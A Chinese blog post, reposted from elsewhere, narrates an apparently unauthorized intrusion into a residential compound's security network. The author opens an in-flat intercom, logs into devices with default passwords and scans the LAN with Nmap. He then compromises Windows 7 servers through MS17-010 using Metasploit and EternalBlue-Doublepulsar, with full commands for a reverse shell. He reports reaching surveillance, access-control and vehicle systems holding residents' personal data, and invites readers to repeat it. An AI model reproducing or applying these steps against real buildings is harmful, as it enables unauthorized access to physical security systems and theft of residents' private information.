实战|拿下小区的安防系统

ivi

天驿安全 2023-12-04 03:30 发表于甘肃

近源渗透
01

前言
这篇文章的思路在现在看来还是有一定的价值，用这个思路我觉得还能拿下自己小区的安防系统。
博主所购的小区对自己的智能化系统宣传的很到位，所以闲下来的时候博主我就对小区的安防系统进行一次简单的渗透，轻松拿下各种安防系统，这篇文章就来详细的说明一下。

02

准备
开始之前，博主需要对环境进行一个简单的描述，以便大家能够在脑海中脑补一下整个渗透测试的过程，算是博主在线下渗透的一个例子吧，往后还有对整个商场各种店铺各种的渗透过程，都会一一讲解。
好了，废话就不多说了，咱们既然是对网络系统进行渗透测试，自然是得有一个入口，那这个入口在哪找呢？

大家都知道，一般小区这种内部的网络都是不直接连接到外网的，如果连那也是做了隔离，单独有一个跳板来做转发，这样相对比较安全，但是正常情况都是没外网的，这种局域网系统有两个突出的特点。
第一点就是维护人员过分的信任了内网的机器，认为只要不连接外网就基本上没事，高枕无忧，真是图样图森破。

第二点就是没有安全防护软件，就算有，那也是病毒特征库千百年不会更新，跟摆设一样，没有外网更新个毛线，这一点后面有机器可以验证。
所以具备这两个特点的内部局域网是非常脆弱的，只要找到一个入口，基本上整个网络就game over了，这个入口就非常的好找了。

众所周知，现在的小区都是家家户户安装了一个可视对讲机，这玩意有时候挺好用，比如有客人来了，楼下大门门禁可以用这玩意远程开门，可以语音对讲，可以看到对方的脸，还可以录音录像，不仅如此，还能跟家里的烟雾报警器连起来，发生火灾直接通知物业并发出警报，还可以呼叫其他住户来一个免费的局域网语音聊天，功能可以说是相当丰富了。

你猜的没错，咱们整个渗透测试过程就从这个设备开始，先来看看咱们这个厉害的可视对讲机长什么样


通过缺省弱口令进入工程模式，拿到ip地址，网关还有服务器地址




拆下对讲机


我擦嘞，这网线也太短了吧，上工具



把网线进行延长方便接交换机、路由器、笔记本之类的设备，最后确认下通讯是否正确


基本准备工作搞定之后就开始进行入侵渗透了。

03开干

根据之前撸光猫内网的经验，这里的IP地址肯定是固定的，而且跟住户号是绑定的，如果使用自己的iP地址进行测试，万一出啥问题那不是非常的尴尬，既然现在很多业主都还没有入住，那么IP地址池也有很多的空闲，就使用其他住户的IP地址吧，只要不冲突就行，说干就干，上装备：
一个充电宝、一个路由器、一台笔记本






通电后设置路由器的固定IP


这样笔记本通过无线wifi就可以对IP段进行扫描了，我这使用的扫描软件是Angry IP Scanner，图形界面用起来很爽，而且速度也快


对192.165.0.1/16进行扫描发现存活主机1256个，为了对IP地址快速分类，将存活的IP地址全部导出，编写python脚本对ip的http响应头进行分类，



最终分为下面的这几类：



第一类
mini_httpd/1.19 19dec2003
这一类机器是所有的门禁机，包含了住户家里的对讲机，楼栋大堂的门禁机，车库电梯的门禁机，小区大门的门禁机，通过ip地址以及admin / 123456弱口令可以远程控制，同时telnet也可以连接，管理页面功能很全，包括修改密码，控制开门时间，控制门禁机密码，呼叫住户，呼叫物业中心，恢复出厂设置等等，功能丰富，界面如下





第二类
DNVRS-Webs
Hikvision-webs/
App-webs/
这三种都是海康威视的监控探头，登录界面有以下几种






只有中间那种可以无限次输错密码进行爆破，其他两种都是输错五次就锁定


第三类
Net Keybord-Webs
这是一个网络键盘，通常用于操作监控的云台转动，比如球机的操作杆，登录界面



密码输错6次就锁定。


第四类
Boa/0.94.13
这个就有意思了，这是车牌识别系统，车辆入库的时候进行车牌识别，拍照存储的机器，也是全部admin admin弱口令直接登录，里面存储了些啥就不多说了，放两张图大家随意感受下







通过对这几种设备的归类扫描，最终确定了几台windows服务器

192.165.15.174
192.165.15.177
192.165.15.190
192.165.15.200
192.165.30.2
使用Nmap扫描结果如下

1. # Nmap 7.70 scan initiated Fri May 18 23:51:30 2018 as: nmap -iL something_ip.txt -oN scaned.txt -T4 --open
   
2. Nmap scan report for 192.165.15.174
   
3. Host is up (0.063s latency).
   
4. Not shown: 990 closed ports
   
5. PORT      STATE SERVICE
   
6. 135/tcp   open  msrpc
   
7. 139/tcp   open  netbios-ssn
   
8. 445/tcp   open  microsoft-ds
   
9. 1433/tcp  open  ms-sql-s
   
10. 2383/tcp  open  ms-olap4
    
11. 49152/tcp open  unknown
    
12. 49153/tcp open  unknown
    
13. 49154/tcp open  unknown
    
14. 49155/tcp open  unknown
    
15. 49156/tcp open  unknown
    
16. 
    
17. Nmap scan report for 192.165.15.190
    
18. Host is up (0.046s latency).
    
19. Not shown: 992 closed ports
    
20. PORT      STATE SERVICE
    
21. 135/tcp   open  msrpc
    
22. 139/tcp   open  netbios-ssn
    
23. 445/tcp   open  microsoft-ds
    
24. 49152/tcp open  unknown
    
25. 49153/tcp open  unknown
    
26. 49154/tcp open  unknown
    
27. 49155/tcp open  unknown
    
28. 49156/tcp open  unknown
    
29. 
    
30. Nmap scan report for 192.165.15.200
    
31. Host is up (0.030s latency).
    
32. Not shown: 991 closed ports
    
33. PORT      STATE SERVICE
    
34. 135/tcp   open  msrpc
    
35. 139/tcp   open  netbios-ssn
    
36. 445/tcp   open  microsoft-ds
    
37. 49152/tcp open  unknown
    
38. 49153/tcp open  unknown
    
39. 49154/tcp open  unknown
    
40. 49155/tcp open  unknown
    
41. 49156/tcp open  unknown
    
42. 49157/tcp open  unknown
    
43. 
    
44. Nmap scan report for 192.165.30.2
    
45. Host is up (0.064s latency).
    
46. Not shown: 990 closed ports
    
47. PORT      STATE SERVICE
    
48. 135/tcp   open  msrpc
    
49. 139/tcp   open  netbios-ssn
    
50. 445/tcp   open  microsoft-ds
    
51. 3389/tcp  open  ms-wbt-server
    
52. 49152/tcp open  unknown
    
53. 49153/tcp open  unknown
    
54. 49154/tcp open  unknown
    
55. 49155/tcp open  unknown
    
56. 49156/tcp open  unknown
    
57. 49157/tcp open  unknown
    
58. 
    
59. # Nmap done at Fri May 18 23:51:46 2018 -- 5 IP addresses (4 hosts up) scanned in 16.25 seconds

复制代码

很明显，四台机器都开了445端口，其中 192.165.15.174 开了1433端口，明显是sql server数据库，192.165.30.2还开了3389，这台机器是在门禁机里面见过，是门禁系统的服务器。

下面就重点对这几台机器入手，使用msf扫描下看是不是都存在smb漏洞（ms17_010），这漏洞在局域网真的超级好用，扫描截图



发现只有192.165.15.174 不存在ms17_010，其他三台都存在，操作系统分别是

192.165.15.190 win7 sp1 x86
192.165.15.200 win7 sp1 x64
192.165.30.2 win7 sp1 x86
现在目标就非常明确了，但是有个问题，msf自带的利用模块只针对x64版本的操作系统，对于x86版本的系统只能使用其他工具，emmmmm....

一阵思考之后，博主决定先搞定那台64位win7，为了能够正常的反弹shell回来，我把路由器改成桥接模式，本机电脑设置固定IP，这样我的机器就跟目标机器处于相同网络拓扑，反弹自然无压力



so...

msf的用法我这里就不多说了，如果真不知道，可以留言...给出一张run vnc的截图，拿下监控系统







有趣的是这台机器上居然安装了360安全卫士...

注意看上面一张图的那个监控室，管理员面前有三台机器，所以另外两台我下一步就要搞定。

上面说64位win7已经拿下，现在搞定32位机器，使用 https://github.com/ElevenPaths/E ... lepulsar-Metasploit 这里的Ruby脚本即可，需要注意的是如果本机是kali 64位的需要安装 wine32，安装方法是

1. dpkg --add-architecture i386 && apt-get update && apt-get install wine32
   
2. 而且全程操作需要在root下面，安装完wine32后执行一下 wine32 cmd.exe 这样会自动在/root下面创建.wine目录，这个目录msf会用到
   
3. 
   
4. 使用
   
5. git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git

复制代码

1. 将脚本克隆到本地，然后把目录下的deps 目录和rb文件复制到msf的modules路径下，这样既可以使用了（PS：我这里只复制了rb脚本，deps没有复制过去所以命令不太一样），具体命令如下
   
2. 
   
3. msf > use  exploit/windows/smb/eternalblue_doublepulsar
   
4. msf exploit(windows/smb/eternalblue_doublepulsar) > set ETERNALBLUEPATH /home/poweroff/Github/Eternalblue-Doublepulsar-Metasploit/deps/
   
5. ETERNALBLUEPATH => /home/poweroff/Github/Eternalblue-Doublepulsar-Metasploit/deps/
   
6. msf exploit(windows/smb/eternalblue_doublepulsar) > set DOUBLEPULSARPATH /home/poweroff/Github/Eternalblue-Doublepulsar-Metasploit/deps/
   
7. DOUBLEPULSARPATH => /home/poweroff/Github/Eternalblue-Doublepulsar-Metasploit/deps/
   
8. msf exploit(windows/smb/eternalblue_doublepulsar) > set TARGETARCHITECTURE x86
   
9. TARGETARCHITECTURE => x86
   
10. msf exploit(windows/smb/eternalblue_doublepulsar) > set PROCESSINJECT  wlms.exe
    
11. PROCESSINJECT => wlms.exe
    
12. msf exploit(windows/smb/eternalblue_doublepulsar) > show targets
    
13. 
    
14. Exploit targets:
    
15. 
    
16.    Id  Name
    
17.    --  ----
    
18.    0   Windows XP (all services pack) (x86) (x64)
    
19.    1   Windows Server 2003 SP0 (x86)
    
20.    2   Windows Server 2003 SP1/SP2 (x86)
    
21.    3   Windows Server 2003 (x64)
    
22.    4   Windows Vista (x86)
    
23.    5   Windows Vista (x64)
    
24.    6   Windows Server 2008 (x86)
    
25.    7   Windows Server 2008 R2 (x86) (x64)
    
26.    8   Windows 7 (all services pack) (x86) (x64)
    
27. 
    
28. 
    
29. msf exploit(windows/smb/eternalblue_doublepulsar) > set target 8
    
30. target => 8
    
31. msf exploit(windows/smb/eternalblue_doublepulsar) > set rhost
    
32. set rhost  
    
33. msf exploit(windows/smb/eternalblue_doublepulsar) > set rhost 192.165.15.190
    
34. rhost => 192.165.15.190
    
35. msf exploit(windows/smb/eternalblue_doublepulsar) > set lhost 192.165.7.11
    
36. lhost => 192.165.7.11
    
37. msf exploit(windows/smb/eternalblue_doublepulsar) > exploit

复制代码

不出意外的话攻击就成功了，给出攻击成功的截图。

第一个是门禁系统，没装杀毒软件，就只有一些门禁卡管理软件



第二个系统是车辆管理系统，车辆出入库时候用的


04总结

至此，小区的安防系统已成功拿下，其中在服务器中还发现了大量的敏感文件，包括业主的个人信息，车辆信息，车辆出入登记信息等等，难怪说各种骚扰电话，这简直要分分钟泄露。

05参考链接

文章来源：92ez

原文链接：https://www.cnblogs.com/nul1/p/11619605.html

排版：李白你好